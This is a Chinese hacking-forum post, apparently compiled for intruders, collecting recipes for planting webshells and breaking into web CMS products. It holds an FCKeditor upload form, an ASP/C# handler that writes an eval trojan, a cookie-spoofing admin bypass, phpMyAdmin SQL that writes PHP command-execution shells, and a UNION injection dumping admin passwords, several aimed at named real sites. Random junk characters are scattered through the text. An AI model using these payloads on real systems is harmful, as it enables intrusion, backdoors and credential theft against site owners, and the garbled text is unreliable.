- X2 {$ D# y }6 `+ \<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
: I' _( Q5 j% U. f' [% ^% JUpload a new file:<br>9 }" t9 Q$ d/ [, @: w4 T I
<input type="file" name="NewFile" size="50"><br>6 _; ^1 i# }& g) g
<input id="btnUpload" type="submit" value="Upload">
3 S4 X8 g: B! @" i# L3 l- {+ u/ v$ s</form>
- u) l, Z1 Z" _) I7 d v-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 H+ r- J H6 m3 M6 P: k7 s- }+ [$ A
SDcms 后台拿webshell. S5 O" l) z: Z
; s/ ^6 z( T) d9 C2 w& E1 a' P
第一种方法:" r0 G9 @+ P6 M6 Z/ i0 o y0 h' B
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
. D4 A) e5 l8 E- |% l把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
- z3 e/ F4 m, L) f用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
4 U0 q+ [% e9 l. l6 L2 y& J第二种方法:6 _" K; g' r7 V. i2 g( B- H! R
进入后台-->系统管理-->系统设置-->系统设置->上传设置;; C v2 |8 q8 }0 Q; K) m9 I2 A
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!# b g+ |% U0 f( ~3 h9 M# l
第三种方法:: Z. }4 w+ \$ u+ c2 x( A
进入后台-->界面管理-->模板文件管理-->创建文件& d0 C4 c* E8 X. Y
文件名写入getshell.ashx
+ P) j9 c$ }0 B* z# V5 ] y内容写入下面内容:3 ]. V N$ J3 K0 X' S" r
/====================复制下面的=========================/" G' t& g# z& e. [2 d/ v
<%@ WebHandler Language="C#" Class="Handler" %>& l: j9 G/ W; v# i# A4 c( `
using System;5 u; p% K# [' l
using System.Web;: J# S1 v7 e! m6 E: d7 ~
using System.IO;
+ ]7 V& K& \+ Y' c8 A1 n! Kpublic class Handler : IHttpHandler {! t: C0 \; a/ e0 h. z T+ Q
public void ProcessRequest (HttpContext context) {
# X) `. Z: V6 k @0 s3 o$ e+ xcontext.Response.ContentType = "text/plain";
6 C8 p4 V; e5 QStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));$ d2 m7 o4 F2 R$ Y3 x' v2 X
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>"); J3 Y1 j- c m1 ^! l+ F
file1.Flush();2 m: d& E+ @8 |% F0 }: |7 r
file1.Close();
8 i, O8 U/ j/ @# @2 S9 S}& O, d: X' b: i; D- K/ c& B9 S" m$ l
public bool IsReusable {6 u" h2 s( o7 q L3 e9 c1 t6 p$ q
get {4 R# l2 d4 L( m/ C) a* j
return false;
; S5 K' u1 ?# u y7 I6 N6 c}
, Z8 | `5 L o, [$ T}
, x4 k+ P. E& _- v" B}
1 w2 x' M( o' ]$ q. q+ l5 p0 f$ X6 r/=============================================/# l2 Z0 c8 I3 {2 @) L4 Q
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx+ o/ s: d8 J) G( R I. X* m
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接# U* M" L* _+ r* G& e
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! Z6 F/ y0 y4 `' T" S- [ q8 I: m- O, g6 q% E* D2 A
ESCMS网站管理系统0day. o; [' ]: ~7 q: \" k
/ m; m) e- K& h$ W6 U% f! t后台登陆验证是通过admin/check.asp实现的
9 X: {1 c# C' c' j! T) m9 R6 h
4 X: Z& c8 ?0 P1 [+ K4 [首先我们打开http://target.com/admin/es_index.html
! h1 s( A j$ Z3 Q F7 {' C, l! B然后在COOKIE结尾加上0 M& ], n$ d+ k( B
; ESCMS$_SP2=ES_admin=st0p;
5 c& x& s. y* q( o8 Y修改,然后刷新9 n& k2 }9 h; S* A/ [" v
进后台了嘎.. ] `) V% q' Z& D8 c: e) ~; t/ V
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
1 ]2 b+ K7 n n0 L. p9 {2 i- l D8 S/ D4 e7 L3 _, i
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
+ p- Q0 l) {# C) \嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp* H" a2 H. @( J! K* L# J( f
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..7 G2 P* ~, W2 L; \+ [' b. s
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了" [$ F$ N/ B! I- L. l& @" [8 f
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 _6 L. c9 |' f7 j8 f8 v
2 b6 a1 J! F7 `8 Y宁志网站管理系统后台无验证漏洞及修复
* [7 l, p& t2 r" p$ {. z9 M
. o" f$ Y; U$ ]! [7 R8 }% m- E网上搜了一下,好像没有发布.如有雷同纯粹巧合!
6 j& }3 p6 N e. f c% r官方网站:www.ningzhi.net2 ^# h1 {! f0 f6 o6 q& l
学校网站管理系统 V.2011版本 % }9 ?& U3 |1 Y8 | [$ O! `
http://down.chinaz.com/soft/29943.htm
$ n2 B7 ^4 O7 u1 Q# O. ]# w+ H1 y3 V其它版本(如:政府版等),自行下载.
, I _: a7 h) m8 u漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~5 V/ F4 L q, E8 _: s5 s
login.asp代码如下:
/ i5 c* T3 `5 r6 S<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> * c, w, `+ D4 t) W; D1 B: y
manage.asp代码我就不帖出来了.反正也没验证.: X ? G8 c* F6 n, C* g; a' v3 @2 B1 L
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
: B0 Z/ o* I5 @5 L漏洞利用:
- B2 p+ E; u5 C* Q, h" y直接访问http://www.0855.tv/admin/manage.asp
; @2 e3 K" \8 f% E, O2 _数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5! A2 \* E+ w0 \" J2 V" y
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 J" H# S2 T) W9 q3 \ m8 X
8 ?) M; y2 G1 z' d( ]phpmyadmin拿shell的四种方法总结及修复3 x4 J4 I& i6 h' P
, Y3 ]. V) [" S5 N4 x方法一:
0 |- r4 Q3 {8 _9 e% M( KCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
# T( z" M c& aINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');. {4 \, F0 C" x- q# w
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
8 G4 F0 r( _" j2 |2 N/ T----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
# [# a7 G6 s) r: ` 一句话连接密码:7on6 s8 X f. P7 p: N2 f
方法二:9 G3 A# H) y% L4 t& Z% M1 ~% m
读取文件内容: select load_file('E:/xamp/www/s.php');
! C: A% N0 }1 p- N- Y! l写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
$ a; D, w/ a( t' t, mcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
) B' t/ n2 p; l/ r/ M* A! W方法三:
3 O7 b- L Z4 v0 CJhackJ版本 PHPmyadmin拿shell5 j. D, L( Q9 N$ h( S
Create TABLE study (cmd text NOT NULL);6 a6 H( k- D2 [, f" e$ m1 E/ Z
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');8 y. L% `3 M; P
select cmd from study into outfile 'E:/wamp/www/7.php';: L2 g% ?5 ]$ q" T' n5 C. Y
Drop TABLE IF EXISTS study;' y1 }" u7 `# ]
<?php eval($_POST[cmd])?>; e. y' F0 s9 K7 I- U3 g
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
& V. q6 b6 M0 g+ r" VINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1* z* H5 x: ?( S/ u$ b/ F" \1 Q
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1* Z: i: w# k1 J' M8 l
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。+ E' W8 f) z" i1 ^2 U. ~
方法四:
3 x& K6 }1 U: h5 ~5 F! w) t% tselect load_file('E:/xamp/www/study.php');: D. m+ L$ x% C, L
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; C$ R, q9 H+ k$ p然后访问网站目录:http://www.2cto.com/study.php?cmd=dir2 f4 M* Q. ?) L' G* [8 f& g0 P
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ n3 O9 D$ T& z& t5 T; R
1 ~1 p# \/ U, ~7 _* vNO.001中学网站管理系统 Build 110628 注入漏洞5 q `' n( g4 a
~& b/ a1 V R9 c( P+ [NO.001中学网站管理系统功能模块:4 ], g. B' ]# E7 r& z
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
8 [8 y0 }: K" Q6 K# O2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
! v6 H8 H' A4 \) B5 O. J3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息# n1 V! I) {* r. F
4.视频图片管理:一级分类,动态添加视频或者图片等信息
9 d3 }. p+ O8 O. n5.留言管理:对留言,修改,删除、回复等管理
- `( Z% J" W5 R2 I' A, z* Y0 G- ?6.校友频道:包括校友资料excel导出、管理等功能
% Q+ v! P# p! m7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页7 q/ m! Y$ i' H
默认后台:admin/login.asp& c7 h& K: Z+ a( x+ G6 A+ ^
官方演示:http://demo.001cms.net0 Q, z% A" u0 m7 ]8 ?1 ~
源码下载地址:http://down.chinaz.com/soft/30187.htm
8 a8 R7 E2 _$ ^+ }0 s: PEXP:' ]6 K+ X6 H) i: D
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! L4 ] o% [" l, D7 d测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin+ F0 d- x) @. F! A2 j5 c
getshell:后台有备份,你懂的; N4 }5 m; ^0 y/ N" N
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。3 `2 Y0 e5 t9 d1 c8 c
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对